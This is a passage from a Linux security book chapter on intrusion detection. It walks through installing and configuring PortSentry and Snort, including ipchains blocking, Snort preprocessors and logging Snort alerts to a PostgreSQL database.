half-open +scans,you can use the -stcp option,which is discussed shortly.The options that +you specify in the portsentry.conf file will also affect how you start PortSentry. +For example,if you wish to listen to UDP traffic,you would configure the port- +sentry.conf file to contain additional references to UDP ports.The startup com- +mands for PortSentry include the following: +(cid:2) portsentry -tcp Starts the program as a standard TCP host-based IDS. +PortSentry simply listens to the open TCP ports you specify. +(cid:2) portsentry -udp Starts the program as a standard UDP host-based +IDS.PortSentry simply listens to the open UDP ports you specify. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 224 +224 Chapter 4 • Implementing an Intrusion Detection System +(cid:2) portsentry -stcp Allows PortSentry to listen for stealth TCP scans.The +chief difference between this argument and the simple –tcp argument is +that PortSentry opens up a socket to capture FIN,half-open-connection, +and full-connection scans. +(cid:2) portsentry -atcp Configures PortSentry to block all hosts connecting +to the ports you specify in portsentry.conf.You must explicitly exclude +any hosts that legitimately use the ports listed,or they will be blocked. +As you might guess,this feature can result in false positives.One possible +result is that you may block yourself from FTP,Web,and e-mail sites as +you try to use them. +(cid:2) portsentry -sudp Allows PortSentry to listen for stealth UDP scans, +similar to the -stcp option. +(cid:2) portsentry -audp Configures PortSentry to become ultra-sensitive to +udp scans.Except for the fact that this option has PortSentry bind to +UDP ports,it behaves exactly like the -atcp argument. +Customize each system that you have depending upon its function and place +in your network.For example,if you have any systems residing in a demilitarized +zone (DMZ)—which is a special network that usually houses DNS,Web,and +even e-mail servers—you may wish to use the -atcp option so that PortSentry +can block scanning hosts. +Exercise: Installing and Configuring PortSentry +1. Obtain PortSentry from www.psionic.com. +2. Place the tarball into the /root/ directory. +3. Untar the file by using the following command: +tar –zxvf portsentry-1.0.tar.gz +4. Change to the portsentry-1.0 directory. +5. The PortSentry installation process asks that you use the make com- +mand with an option particular to your operating system.To install +PortSentry on your Linux system,enter the following command: +make linux +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 225 +Implementing an Intrusion Detection System • Chapter 4 225 +6. Make will compile the binaries.Install these binaries into the /usr/ +local/psionic/portsentry/ directory by issuing the following command: +make install +7. Change to the /usr/local/psionic/portsentry/ directory. +8. Open the portsentry.conf file in your favorite text editor,such as pico +or vi. +9. Scroll down to the Port Configuration section and notice that the inter- +mediate setting is not commented out.This means that the TCP and +UDP ports listed will be monitored.If you wish,you can add ports to +this list.Just make sure that you use a comma to separate ay ports you +wish to monitor and that you end the entire list with a quotation mark. +10. Scroll down to the Dropping Routes section.Review the default +settings as you pass by. +11. Find the Generic Linux entry,then scroll down to the packet filter +options. +12. Find the KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j +DENY -l" line,then uncomment it.This entry uses the ipchains com- +mand to add the attacking host to the Ipchains table.If a host scans your +system or even connects to a listed port,PortSentry will cause Ipchains +to deny all connections between this host and yours.As a result,your +system will not respond to any packets originating from the attacking +host,and your system will become a “black hole,”as it were.Only +uncomment one KILL_ROUTE entry at a time,because PortSentry +does not support multiple entries and will crash.If you wish,edit this +entry so that it uses Iptables,instead. +13. Scroll down to the TCPWrappers section and comment the first +KILL_HOSTS_DENY entry and uncomment the second one that +purports to be for New Style systems. +14. Finally,scan down to the Port Banner Section and uncomment the +PORT_BANNER line.This entry has PortSentry automatically issue a +warning to anyone trying to listen in on your port. +15. After you have edited portsentry.conf,quit the file,making sure to save +your changes. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 226 +226 Chapter 4 • Implementing an Intrusion Detection System +16. Start PortSentry using the following command: +portsentry -stcp +17. Use the ps command to see whether PortSentry has activated: +ps aux | grep psioni +root 787 0.0 0.0 1660 24 ? S Mar09 0:03 +/usr/local/psioni +Note that this command has the ps command search all processes, +then use grep to search for the letters psioni in psionic. +18. Now that you have confirmed that PortSentry is running,use a remote +host’s copy of Nmap to scan your host. +19. The Nmap scan may complete,or it may hang.On the host running +PortSentry,test to see if your settings were effective.First,issue the fol- +lowing command to see if the host running Nmap has been added to +the /etc/hosts.deny file: +cat /etc/hosts.deny +20. You should see that your scanning host has been added.However,the +/etc/hosts.deny file protects only those daemons started by xinetd.The +more comprehensive and powerful way to block remote hosts is the use +of Ipchains.The ipchains command allows you to implement a packet +filter on your Linux system.You will learn more about how to use +Ipchains to create a firewall in future chapters.Note,however,that +Ipchains is not supported by the 2.4 kernel.You will have to edit the +portsentry.conf file to use Iptables.If your system does use Ipchains, +PortSentry simply uses this application to automatically configure your +host to drop any and all packets coming in from the attacking host.List +the packet filtering table to see if your scanning host has been added to +the ipchains filtering table: +ipchains –L +Chain input (policy ACCEPT): +target prot opt source destination ports +DENY all ----l- yourhost.yournetwork.com anywhere n/a +Chain forward (policy ACCEPT): +Chain output (policy ACCEPT): +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 227 +Implementing an Intrusion Detection System • Chapter 4 227 +21. This output shows that all incoming traffic from your scanning is +denied.Try to use any Web browser,FTP client,or Telnet to access this +host.You will be denied.You won’t even be able to ping the host. +Exercise: Clearing Ipchains Rules +1. You may want to allow a blocked host to communicate with your +system again.Do this by editing the /etc/hosts.deny file and eliminating +any reference to the host you have just blocked. +2. Use the following command to eliminate the first Ipchains input entry: +ipchains –D input 1 +3. You may have to delete additional rules in the input chain.If so,you can +specify additional rules: +ipchains –D input 2 +4. You can then list all chains again to ensure that you have blocked all +traffic.To eliminate any and all entries,use the flush command: +ipchains –F +Exercise: Running an External +Command Using PortSentry +Although not always appropriate in all instances,you can configure PortSentry to +run an external command.In this example,you will run Nmap against the scan- +ning host.Remember,this may not be the best option,because it is possible that +the person who has scanned you has spoofed the connection,and you will be +blocking the wrong IP address.The command shown in this exercise is an +example of what you can do with PortSentry. +1. Open the /usr/local/psionic/portsentry/portsentry.conf file. +2. Scroll down to the External Command section,and enter the following +all on one line: +KILL_RUN_CMD="/usr/bin/nmap -O $TARGET$" >> +/usr/local/psionic/portsentry/scan.txt +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 228 +228 Chapter 4 • Implementing an Intrusion Detection System +3. Exit the file and save your changes. +4. Completely kill PortSentry: +ps aux | grep psion +[pid info] +kill PID +5. Restart PortSentry in standard tcp mode.This mode will generate fewer +false positives when using an external command. +portsentry -tcp +6. Make sure that all /etc/hosts.deny and Ipchains entries are eliminated. +7. Conduct a scan from a remote host. +8. After the scan is completed,check Ipchains and the /etc/hosts.deny file +to see that PortSentry added the route.Now,check the /usr/local/ +psionic/portsentry/scan.txt.You will see that your own system has con- +ducted a reverse scan of the attacking host.This exercise has shown a +simple Nmap scan,however.Consider what would happen if a malicious +user used Nmap to spoof your default gateway.You would be denied +access to the rest of your WAN. +9. Issue the following command to continuously read the /var/log/ +messages file: +tail -f /var/log/messages +10. Use your scanning host to scan the host with PortSentry enabled. +11. You will see messages from PortSentry informing you of the scan and +the actions it has taken.If the scanning host is already added to the +Ipchains forward chain and to /etc/hosts.deny,then PortSentry will +inform you.If you have restarted PortSentry,then the program will add +another entry using Ipchains and TCPWrappers. +12. You need to ensure that PortSentry will start at boot time.You can +create your own custom script and place it in the /etc/rc.d/init.d/ +directory,or you can simply place it at the bottom of the /etc/rc.d/ +rc.local file.Now,each time your system boots,PortSentry will start. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 229 +Implementing an Intrusion Detection System • Chapter 4 229 +Installing and Configuring Snort +Snort,available at www.snort.org,is best suited to detailed log analysis.Like +PortSentry,it places your NIC into promiscuous mode.Unlike PortSentry,it cap- +tures all traffic on your network segment,as opposed to traffic destined for just +one host.Its method of capturing and logging packets is also much more sophis- +ticated,because it can log its findings into remote or local databases.Snort’s anal- +ysis feature is able to read the contents of the captured packets and then inform +you about any attacks waged against your network. +Availability +You can download Snort in various forms,including the following: +(cid:2) Binary RPM A version of Snort that is ready to operate.Generally, +however,precompiled versions of Snort have certain features disabled. +You also often have to edit various files before Snort will operate cor- +rectly.This version is quite convenient,because it will automatically pro- +vide startup scripts and plug-ins.However,this distribution format +currently has some important limitations,including the fact that the +Snort binary does not support database logging. +(cid:2) Source RPM Installs all source files to the same locations as the binary +RPM.You must then run make against the installation files in order to +compile the Snort binary and the supporting files. +(cid:2) Tarball The preferred format because you can specify compile-time +options to enable specific database support. +Supporting Libraries +For full functionality,you will need the following libraries: +(cid:2) Libpcap Usually installed by default,this is a library responsible for +capturing network packets. +(cid:2) A database In order to use Snort with a database,you will need a +database such as PostgreSQL or MySQL.This chapter focuses on +PostgreSQL. +(cid:2) Libnet Snort has a feature called Flex Response,which enables it to issue +third-party commands to help block network traffic after an alert occurs. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 230 +230 Chapter 4 • Implementing an Intrusion Detection System +In order to use the Flex Response feature,you must have Libnet +installed.The Flex Response feature is still experimental,and its use is +not recommended. +Understanding Snort Rules +Snort is able to automatically detect attacks based solely upon the rules it uses. +Depending upon the rules you specify,Snort can identify various attacks, +including the following: +(cid:2) Port scans for all hosts, including stealth port scans This feature +is useful even if you have PortSentry installed,because Snort will read +the attacks as they come across the network wire before they reach the +host. +(cid:2) Attacks meant to exploit well-known buffer overflows, such as +attacks against older versions of Sendmail that lead to a root +compromise Snort is able to do this because the SMTP-specific rules +are able to have Snort capture and then analyze all SMTP-based packets +for typical text strings and packets used in such exploits. +(cid:2) CGI attacks Snort can help protect your Web servers from the most +commonly-known attacks. +(cid:2) Server Message Block (SMB) probes You can protect your +Windows servers by searching for typical attacks,such as brute force, +scanning,and dictionary attacks. +(cid:2) Operating system fingerprinting Snort can identify many of the +most common tools such as Nmap and Queso. +Snort Variables +For the sake of logging accuracy,you can configure the snort.conf file to recog- +nize the “home”(local) network,as well as any external networks,as well as the +network’s DNS servers.Typical entries are as follows: +(cid:2) var HOME_NET [192.168.1.0/24] Specifies the 192.168.1.0 net- +work,with a standard class C subnet mask.Snort always uses Classless +Internet Domain Routing (CIDR) notation,because it cannot simply +assume that all IP addresses use standard Class A,B,and C subnet masks. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 231 +Implementing an Intrusion Detection System • Chapter 4 231 +You,of course,would substitute your own IP address.It is important that +you follow the syntax of this variable exactly.You may have to edit the +/etc/snort/snort.conf file so that it uses brackets instead of quotes.If you +have many internal networks,you can enter multiple IP addresses:var +HOME_NET [192.168.1.0/24, 10.100.100.1/24] to ensure that all +systems on your network are logged when you place Snort into IDS +mode. +(cid:2) var EXTERNAL_NET any This particular example has Snort treat +all IP addresses other than 192.168.1.0 as external to its interface.Instead +of using the any keyword,you can enter specific network addresses (such +as 192.168.2.0 and 192.168.3.0). +(cid:2) var DNS_SERVERS [10.100.100.50/24,192.168.2.50/24] Allows +you to determine the DNS servers Snort can use. +Snort Files and Directories +Here is a review of the files and directories used by Snort: +(cid:2) /usr/local/snort The Snort binary,when installed from an RPM +package.The binary RPM version is not configured for database support. +(cid:2) /usr/local/bin/snort The binary,when installed from a tarball. +(cid:2) /etc/snort/ A directory that contains the Snort configuration file,as +well as all Snort rules. +(cid:2) /etc/snort/snort.conf The Snort configuration file,which informs +Snort about the nature of the network it is monitoring and which +allows you to exclude certain hosts,determine the rules used,and set +logging and alerting options. +(cid:2) /usr/share/doc/snort-1.7 The documentation directory if you install +Snort using the RPM.If you install using a tarball,the documentation +will be in the subdirectory where you installed all of the source files. +(cid:2) /etc/rc.d/init.d/snortd The initialization script for snortd.This script +comes with the RPM package.You will be editing this script to customize +how Snort initializes. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 232 +232 Chapter 4 • Implementing an Intrusion Detection System +Snort Plug-Ins +It is possible to use several detection plug-ins.You specify the use of plug-ins in +the snort.conf file by using preprocessor entries.They include the following: +(cid:2) stream Called the TCP Stream Reassembly plug-in;is able to reconsti- +tute TCP connections between network hosts.This ability is important, +because most IDS applications have difficulty tracing extremely slow +scans and attacks. +(cid:2) defrag Allows Snort to search and reconstitute IP traffic. +(cid:2) http_decode Tells Snort to listen for packets addressed to ports you +specify. +(cid:2) portscan Allows you to specify a separate logging location for port scans. +(cid:2) portscan-ignorehosts Sometimes,you will want to specify hosts that +are allowed to conduct scans,or which are allowed to send unusual +packets.DNS servers,for example,can send replies that Snort can mis- +understand.This plug-in allows you to list such hosts. +(cid:2) minfrag Snort is able to reconstitute attacks that have been broken up +into smaller bits using this plug-in. +Sometimes,plug-ins do not require additional arguments.At other times,they +require you to specify additional parameters.For example,the stream preprocessor +requires that you give a timeout period,which ensures that Snort does not +become bogged down.You can then specify the ports to monitor and then set a +limit on the maximum number of bytes Snort will capture.Here is an example: +preprocessor stream: timeout 4, ports 21 23 80 8080, maxbytes 17000 +Here are additional entries: +(cid:2) preprocessor defrag Enables the defrag value. +(cid:2) preprocessor http_decode: 80 8080 Specifies monitoring of ports 80 +and 8080 on the network. +(cid:2) preprocessor portscan: $HOME_NET 4 3 /var/log/snort/ +portscan.log Creates a log entry for port scans. +(cid:2) preprocessor portscan-ignorehosts: $DNS_SERVERS Has Snort +read the DNS_SERVERS variable entry. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 233 +Implementing an Intrusion Detection System • Chapter 4 233 +(cid:2) preprocessor minfrag: 128 Tells Snort to issue an alert if the value of +a fragment is below 128. +Some plug-ins,such as Spade,are also available.As of this writing,the Spade +plug-in is still experimental.You can read more about the plug-ins by consulting +the Snort documentation in the /usr/share/doc/snort-1.7/ directory. +Starting Snort +You can start Snort in three basic ways.To start Snort as a simple packet sniffer, +issue the following command: +snort -v +This command will log traffic only at the network level.Figure 4.5 shows +what Snort reports when it logs a simple ICMP packet sent between two other +hosts on the network. +Figure 4.5 Using Snort to View ICMP Packet Information +Notice how you are able to read the source and destination information,as +well as the nature of the packet (the TTL,the sequence (ID) number,and +whether the ICMP packet is an ECHO or ECHO REPLY). +After you end your session,you will receive a message informing you about +the total number of packets Snort has been able to capture.See Figure 4.6. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 234 +234 Chapter 4 • Implementing an Intrusion Detection System +Figure 4.6 A Snort Summary Report +If you use the -d option to have Snort capture application-layer data,you will +capture additional information.Figure 4.7 shows the additional information Snort +finds when it is started as follows: +snort -vd +Notice that you can now see the host names involved (james and jacob).You +also see additional information concerning the exact nature of the ICMP packets +being sent back and forth.Figure 4.8 shows Snort capturing a simple HTTP ses- +sion.Notice how it is able to capture the text “This is james”from the HTML +that creates the Web page. +As you can see,Snort can report all information found in an unencrypted +packet.Thus far,you have been using Snort as a glorified packet sniffer. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 235 +Implementing an Intrusion Detection System • Chapter 4 235 +Figure 4.7 Capturing Application-Layer Data with Snort +Figure 4.8 Capturing an HTTP Session +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 236 +236 Chapter 4 • Implementing an Intrusion Detection System +Logging Snort Entries +The next way to use Snort is to have it store what it finds into log files.Issue the +following command: +/usr/sbin/snort -u snort -g snort -dev -l /var/log/snort -h +192.168.2.0/24 +This command starts Snort under a user and group of Snort (the RPM file +installation automatically creates these users),then logs all packets to the +/var/log/snort directory.You can specify any directory you wish.The e option +has Snort read data link layer headers,as well.The -h command tells Snort that +the 192.168.2.0/24 network is the home network and to log all packets relative +to the 192.168.2.0 system.You will have to ensure that the /var/log/snort direc- +tory exists before you issue this command.All packets will be logged to this +directory.Snort will create a directory for each host it detects.Each directory will +contain a file that contains the messages specific to that host. +Running Snort as a Network-Based IDS +Thus far,you have seen how to run Snort from the command line so that it cap- +tures all traffic.However,the snort.conf file gives you the ability to use Snort as a +true IDS because it has Snort use rules and plug-ins.You can also specify more +sophisticated home network and logging methods.After you begin using the +rules and plug-ins found in snort.conf,it will begin selectively logging traffic. +Specifically,it will log only suspicious activity for your home network.The fol- +lowing line has Snort run using the /etc/snort/snort.conf file.The -D option has +Snort run as a daemon: +snort -u snort -g snort -dev -h 192.168.2.0/24 -d -D -i eth0 -c +/etc/snort/snort.conf +This command has snort run in daemon mode (-D) and specifies the eth0 +interface.The last part of the command specifies the snort.conf file,which if +properly configured will enable Snort to log traffic only as it violates the rules it +contains.If you use this command,make sure that your snort.conf file is properly +edited.For example,you will want to make sure that you specify all subnets for +your home network. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 237 +Implementing an Intrusion Detection System • Chapter 4 237 +Ignoring Hosts +You may want to tell Snort to ignore certain hosts on your network.The two +easiest options for configuring Snort to ignore hosts are the following: +(cid:2) Use Tcpdump-style filters on the command line (not in the /etc/snort/ +snort.conf file). +(cid:2) Use the portscan preprocessor entry in /etc/snort/snort.conf. +When using Tcpdump-style filters,suppose that you wished to monitor all +hosts on the network except for the host named james.You would specify the +following at the command line: +snort -u snort -g snort -dev -h 192.168.2.0/24 -d -D -i eth0 -c +/etc/snort/snort.conf +ip and not host james +For more information,consult Chapter 5,or read the main page for Tcpdump. +As far as using the portscan preprocessor is concerned,specify the hosts that +you want to ignore by IP separated only by white space: +preprocessor portscan-ignorehosts: $DNS_SERVERS 10.100.100.50/32 +192.168.2.4/32 +Make sure that you specify 32 for the subnet mask when you wish to block a +specific host. +Additional Logging Options:Text +files,Tcpdump, and Databases +If you wish to have Snort log all alert activity to a single log file,you can use the +following option in the /etc/snort/snort.conf file: +output alert_full: /snortlog/snort.log +NOTE +The output alert_full: /snortlog/snort.log option will not log port scans. +The option for logging port scans is always specified by the “prepro- +cessor portscan:” value. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 238 +238 Chapter 4 • Implementing an Intrusion Detection System +Many applications can read files that are created in Tcpdump format.Snort +supports Tcpdump-compatible formats.Using the -b option allows you to use +applications such as Tcdump and Ethereal to read them later on.To do enable +Snort to do this,use the -b option to the command line (Make sure you enter +this all on one line.): +snort -u snort -g snort -dev -h 192.168.2.0/24 -d -D -i eth0 -c +/etc/snort/snort.conf -b +This command does not specify a directory.By default,Snort will place the +Tcpdump-readable file into the /var/log/snort/ directory.The file will be named +snort-*.log,where the * is the month,day,and time the capture was started.To +read the file using Snort,issue the following command: +snort -dv -r /var/log/snort/packet.log |less +Configuring Snort to Log to a Database +The most elegant way to log traffic is to place it into a database.To begin logging +to a database,take the following steps: +1. Install a database and ensure that it is running properly.In the upcoming +exercise,you will configure PostgreSQL. +2. Create a user,such as snort,on the database.Make sure that this user has +privileges to insert rows and data into the database. +3. Compile a version of Snort that supports logging to databases.The +RPM binary currently does not support database logging. +4. Create a database that will contain the log information. +5. Edit the database so that it has the structure Snort expects.Snort con- +tains files for the PostgreSQL and MySQL databases,as well as others. +6. Edit the /etc/snort/snort.conf file so that Snort logs to your database. +Here is an example of the entry to place into the snort.conf file: +output database: log, postgresql, dbname=snort user=snort +host=localhost password=password +All of this information should all be on one line.This line tells Snort to send +its data to a database with the log priority.You can also use the alert priority, +which gathers all information concerning ping and port scans.The next entry +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 239 +Implementing an Intrusion Detection System • Chapter 4 239 +gives the name of the database you have created.The user,host,and password +entries tell Snort exactly which host to log to.This example has the database log +to a local database,but it is possible to log to a remote database: +output database: log, postgresql, dbname=snort user=snort +host=localhost password=password +The commas are extremely important.You place them after the log and +database entries.You would,of course,enter your own information.If you were +using MySQL,you would enter the following all on one line: +output database: log, postgresql, dbname=snort user=snort +host=databasehost.yournetwork.com password=password +Controlling Logging and Alerts +On busy networks,you need to configure Snort to log less information.The fol- +lowing command-line options help you control how much your IDS will log: +(cid:2) -A full The default setting,which issues all alerts found by the plug-ins. +The alert contains detailed information about the nature of the per- +ceived attack. +(cid:2) -A fast This option has Snort write only a short description,complete +with the source and destination IP addresses and ports and the time the +alert occurred.All other information is left out. +(cid:2) -A unsock This option has Snort send alerts to a local Unix socket +where third-party applications can obtain the data.A Unix socket is +much like a port,except that it is open only to the local host. +(cid:2) -A none This option completely disables logging. +Additional configuration options are available,including the ability to configure +Snort to send alerts to Windows systems that have the Server service running.To +enable SMB alerts,you will have to configure Snort with the `--enable- +smbalerts' option (make sure to use the backtic character first—the key above the +Tab key—and then the standard single-quote character).For more information, +consult the USAGE and INSTALL files that ship with the application. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 240 +240 Chapter 4 • Implementing an Intrusion Detection System +Getting Information +Snort is being developed quite rapidly.To learn more about the latest Snort +developments,you can consult the following resources: +(cid:2) The snort mailing list Go to www.snort.org and select the mailing +list link.This link allows you to sign up for the Snort mailing list,which +is very active and usually informative.Both novice and experienced users +frequent the list,so chances are you will receive the help you need just +by giving adequate information about your system and by asking spe- +cific,well-worded questions. +(cid:2) The snort user archives page Go to http://lists.sourceforge.net/ +mailman/listinfo/snort-users.This archive contains past postings from the +Snort mailing list. +Exercise: Installing Snort +1. To begin experimenting with Snort,install it from the RPM,which is +on the CD that accompanies this book: +rpm –ivh snort-1.7-1.i386.rpm +Later,you will install the snort-1.7.tar.gz file,which has the ability to +log to databases.The RPM version contains a binary that is not com- +piled to work with databases. +NOTE +When you install Snort using the RPM, a user and group named Snort +will automatically be generated. The /etc/rc.d/init.d/snortd script will also +be created. However, you will first need to edit this script before you +continue. +2. After Snort is installed,run Snort as a simple sniffer: +snort -vde +3. If possible,have additional systems ping each other.If you are on a non- +switched network,or if your switch is configured to report all traffic to +your host,you will see the contents of the packets on your screen. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 241 +Implementing an Intrusion Detection System • Chapter 4 241 +4. Stop Snort by pressing CTRL+C.You will see a report summarizing all +of the packets it has captured.Now,issue the following command,sub- +stituting the proper values when necessary (Make sure you enter this all +on one line.): +snort -u snort -g snort -dev -l /var/log/snort -h +your.ip.address.here /CIDR –i eth0 +5. Snort will report the captures to both standard output (your screen) and +also to the /var/log/snort/ directory.Make sure that you specify your IP +address,complete with the proper CIDR notation for your subnet mask. +If you are already using eth0,then you do not need to specify it. +6. Generate some traffic on the network.For example,ping several hosts +on and off the network or open a Web browser or FTP client.Open a +terminal and list the /var/log/snort/ directory.Snort will create a direc- +tory for each system logged and will also log to the /var/log/snort/alert +file.Change to one of the directories off of the /var/log/snortd/ direc- +tory.Notice that this directory contains a message concerning an ICMP +echo packet.Snort has logged this packet because it defaults to logging +all ICMP traffic,which is a chief tool used in denial of service attacks. +7. Issue the same command again,except this time,log the information to +a Tcpdump-readable file. +snort -u snort -g snort -dev -h your.ip.address.here/ +CIDR -d -D -i eth0 –b +8. After you have created this file,read it using the following command: +snort –dv –r /var/log/snort/logfilename.log +9. After you learn more about Tcpdump and Ethereal in the next chapter, +you will be able to read these files to gather more information about the +traffic on your network. +Exercise: Using Snort as an IDS Application +1. Configure Snort to use the /etc/snort/snort.conf file.Doing so will +make Snort become a true IDS application.First,edit snort.conf so that +all variables match values for your specific network.The RPM process +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 242 +242 Chapter 4 • Implementing an Intrusion Detection System +should accurately guess your system’s configuration,but check it to be +sure.One problem Snort has is determining the correct CIDR value for +the subnet mask.Don’t change this value right away,however.It is more +likely that you have made some sort of mistake typing in information. +Here is a list of values to customize or add (comments are entered to +give you an idea of what each entry means): +var HOME_NET [192.168.2.0/24,10.100.100.0/24] +# Add all "home" network IP addresses. +var EXTERNAL_NET any # A standard entry. +var DNS_SERVERS [10.100.100.50/24] +# Make all of your DNS servers are listed here. +preprocessor defrag # A standard entry. +preprocessor http_decode: 80 8080 +# Add the Web ports used on your network. +preprocessor portscan: $HOME_NET 4 3 /var/log/snort/portscan.log +# A standard entry. +preprocessor portscan-ignorehosts: $DNS_SERVERS +# A standard entry. +2. Review the additional entries.You do not need to make any other +changes,because the RPM file installs a default set of rules,which are all +in the /etc/snort/ directory. +3. Exit this file,making sure to save your changes. +4. After you have ensured that all of your snort.conf entries are correct, +issue the following command,all on one line: +snort -u snort -g snort -dev -h your.ip.address.here/ +CIDR -d -D -i eth0 -b -c /etc/snort/snort.conf +5. Snort should have entered daemon mode.It should be logging informa- +tion to all files in the /var/log/snort/ directory.Use the ps command to +see if Snort is running properly: +ps aux | grep snort +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 243 +Implementing an Intrusion Detection System • Chapter 4 243 +If you do not see anything,or see only the grep command itself,a +problem has occurred with either your command line or with the +snort.conf file.Carefully review each.Also,consult the documentation +that comes with the package to see what elements specific to your +system may require changes to these steps. +6. After you have verified that Snort is running,generate some new traffic. +For example,use Nmap to scan a system that is not your DNS server +and ping a host that is not on your network.Notice that instead of log- +ging all information about all hosts,Snort now logs information relevant +to your home network. +7. Check the alert and portscan.log files by opening two terminals and +using the tail -f command: +tail -f /var/log/snort/alert +tail -f /var/log/snort/portscan.log +8. Using a port scanner,scan a host on your network.You should see mes- +sages to each of these files. +Exercise: Configuring Snort to Log to a Database +1. Stop Snort: +killall snort +2. Use the following command to make sure that Snort isn’t running: +ps aux | grep snort +3. Make sure that you have PostgreSQL installed on your system.Red Hat +Linux,for example,ships with this database.Use the following command +to query the RPM database: +rpm –qa | grep postgres +postgresql-server-7.0.2-17 +postgresql-devel-7.0.2-17 +postgresql-7.0.2-17 +Your versions of Postgres may differ.This is not important. +4. Although you have already installed a version of Snort using the RPM, +this version does not support database logging.Obtain the tarball version +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 244 +244 Chapter 4 • Implementing an Intrusion Detection System +from the CD that accompanies this book (snort-1.7.tar.gz),then unzip +and untar it: +tar –zxvf snort-1.7.tar.gz +5. Change to the snort-1.7 directory.This directory contains all of the source +files necessary to compile Snort.Now,issue the following command: +./configure +This simple command will begin a process that automates the cre- +ation of configuration and make files for your specific system.This pro- +gram will automatically find installed database servers,such as Postgres +and MySQL.It will also automatically find the libpcap libraries.If the +configuration program fails,you will have to compile Snort using any of +the following options: +(cid:2) ./configure `--with-libpq-libraries=DIR' If the configuration +file can’t find the Postgres libraries,use this option.The libraries are +often found in the /usr/include/ directory. +(cid:2) ./configure `--with-libpq-includes=DIR' The includes are +often found in the /usr/include/ directory. +(cid:2) ./configure `--with-libpcap-includes=DIR' The libraries are +often found in the /usr/lib/ directory. +(cid:2) ./configure `--with-libpcap-libraries=DIR' The libraries are +often found in the /usr/lib/ directory. +Additional options exist,but these are the ones relevant to database +connectivity.For more information,read the README.database and +INSTALL files. +6. As Snort configures itself,take note of the messages you see.You should +see messages informing you that it has found the database you are using. +NOTE +When using configure options, make sure that you use the backtic char- +acter at the beginning of the option and the standard apostrophe at the +end. Otherwise, compilation will fail. If you wish, you can combine +options: ./configure `--with-libpq-libraries=DIR--with-libpq-includes=DIR’: +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 245 +Implementing an Intrusion Detection System • Chapter 4 245 +7. Issue the following commands,one after the other: +make +make install +8. The tarball version of Snort 1.7 will install the Snort binary into the +/usr/local/bin/ directory.Because the /etc/rc.d/init.d/snortd script is +still very handy,open it in a text editor and edit the script.This script, +like all of the others in this directory,contains sections that start,stop, +and restart the daemon.Find the start section.Edit this section so that it +reads as follows: +daemon /usr/local/bin/snort -dev -D \ +-i $INTERFACE -l /var/log/snort -u snort -g snort -c +/etc/snort/snort.conf -b +9. Exit this file,making sure to save your changes. +10. It is time to configure the database.After you do this,you will edit the +/etc/snort/snort.conf file so that Snort logs to the database. +11. Start PostgreSQL: +/etc/rc.d/init.d/postgres start +12. After PostgreSQL has started,use the /usr/sbin/ntsysv command to +make sure that the database will begin each time you reboot.After in +ntsysv,place an asterisk next to the postgresql command.While you are +at it,check to see if snortd is also selected. +13. Exit ntsysv. +14. Become the postgres user: +su postgres +15. Create a user that can manipulate a database: +createuser snort +Make sure that you answer Yes to both questions:This user must be +able to create databases and create more new users. +16. Create another user,root.This user must also be able to create databases +and create more new users. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 246 +246 Chapter 4 • Implementing an Intrusion Detection System +17. As root,create a database: +createdb -h 127.0.0.1 -U snort -W -e snort +This command has createdb create a database on the local host and +allows the user named snort to manipulate it.The -W command creates a +password,and the -e option simply has createdb echo its processes to +you.The last item,snort,is the name of the database. +18. Exit the postgres shell: +exit +19. Change to the Snort source directory created when you unpacked the +tarball. +20. Change to the contrib/ directory. +21. This directory contains several different applications and files that sup- +plement Snort’s capabilities.Find the create_postgresql file and issue the +following command: +psql snort < ./create_postgresql +22. You will see this script create several tables in the database.You have now +created a structure that Snort can log to. +NOTE +PostgreSQL stores its databases in the /var/lib/pgsql/data/base/ directory. +23. Edit the /etc/snort/snort.conf file and add the following command,all +on one line: +output database: log, postgresql, dbname=snort user=snort +host=localhost password=yourpassword +Make sure that this entry is all on one line.You will,of course,have +to enter the appropriate password information.If you have altered any of +the steps in this exercise,make sure that this line reflects your changes. +24. Exit this file,making sure to save your changes,then restart snortd: +/etc/rc.d/init.d/snortd start +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 247 +Implementing an Intrusion Detection System • Chapter 4 247 +25. Use the following command to verify that Snort has started successfully: +/etc/rc.d/init.d/snortd status +If you receive a message that the subsystem is locked,there is a +problem with your syslog.conf configuration.Check the file and make +any necessary changes.Remember,the RPM binary does not support +logging to databases.Also,this exercise is specific to PostgreSQL.If you +have not compiled in database support,or are using a different database, +view the README.database file for more information. +26. After you have verified that Snort is operating properly,generate some +traffic by using a port scanner.Also,ping several of the hosts. +27. The database you have created earlier is called snort.Use the psql com- +mand to access the snort database: +psql snort +28. Now,issue the following command to see the tables: +\d +You will see a list similar to that in Figure 4.9. +Figure 4.9 Viewing the Snort Database +29. You can view the contents of these tables.For example,issue the +following SQL command: +SELECT* FROM event ; +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 248 +248 Chapter 4 • Implementing an Intrusion Detection System +This command chooses all data (*) from the event table.As long as +you have generated some traffic,you will see information similar to that +shown in Figure 4.10. +Figure 4.10 Viewing the Event Table +30. Query the iphdr table: +SELECT * FROM iphdr ; +This table gives you all IP information concerning your network +hosts.See Figure 4.11. +Each table column gives you the IP addresses of the hosts on your +network,as well as the hosts that have made 